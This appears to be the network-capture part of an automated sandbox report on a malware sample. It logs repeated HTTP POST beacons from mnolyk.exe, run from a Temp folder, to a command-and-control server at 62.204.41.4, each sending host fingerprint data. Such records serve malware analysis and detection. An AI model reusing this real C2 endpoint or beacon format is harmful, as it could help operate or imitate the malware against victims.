Feb 7, 2023 20:03:11.200841904 CET	645	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:03:11.265623093 CET	645	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:03:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
491	192.168.2.6	50216	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:03:11.470014095 CET	646	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:03:11.534045935 CET	646	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:03:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
492	192.168.2.6	50217	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:03:11.704054117 CET	647	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:03:11.768791914 CET	647	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:03:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
493	192.168.2.6	50218	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:03:11.936212063 CET	648	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:03:11.999941111 CET	648	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:03:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
494	192.168.2.6	50219	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:03:12.179096937 CET	649	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:03:12.246732950 CET	649	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:03:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
495	192.168.2.6	50220	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:03:12.442627907 CET	650	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:03:12.506438971 CET	650	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:03:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
496	192.168.2.6	50221	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:03:12.688306093 CET	650	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:03:12.750021935 CET	651	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:03:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
497	192.168.2.6	50222	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:03:12.933465004 CET	652	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:03:12.994988918 CET	652	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:03:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
498	192.168.2.6	50223	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:03:13.167789936 CET	653	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:03:13.231307030 CET	653	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:03:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
499	192.168.2.6	50224	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:03:13.408042908 CET	654	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:03:13.472860098 CET	654	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:03:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
5	192.168.2.6	49723	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:00:52.073818922 CET	110	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:00:52.141586065 CET	110	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:00:52 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
50	192.168.2.6	49769	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:01:03.043961048 CET	163	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:01:03.107919931 CET	163	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:01:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
500	192.168.2.6	50225	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:03:13.640810013 CET	655	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:03:13.704272985 CET	655	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:03:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
501	192.168.2.6	50226	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:03:13.874521971 CET	656	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:03:13.938580036 CET	656	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:03:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
502	192.168.2.6	50227	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:03:14.108352900 CET	657	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:03:14.171869040 CET	657	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:03:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
503	192.168.2.6	50228	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:03:14.349981070 CET	658	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:03:14.415443897 CET	658	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:03:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
504	192.168.2.6	50229	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:03:14.593388081 CET	659	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:03:14.655284882 CET	659	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:03:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
505	192.168.2.6	50230	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:03:14.875718117 CET	660	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:03:14.938288927 CET	660	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:03:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
506	192.168.2.6	50231	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:03:15.107613087 CET	661	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:03:15.171725035 CET	661	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:03:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
507	192.168.2.6	50232	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:03:15.344050884 CET	662	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:03:15.407577991 CET	662	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:03:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
508	192.168.2.6	50233	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:03:15.578131914 CET	663	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:03:15.644202948 CET	663	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:03:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
509	192.168.2.6	50234	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:03:15.828144073 CET	664	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
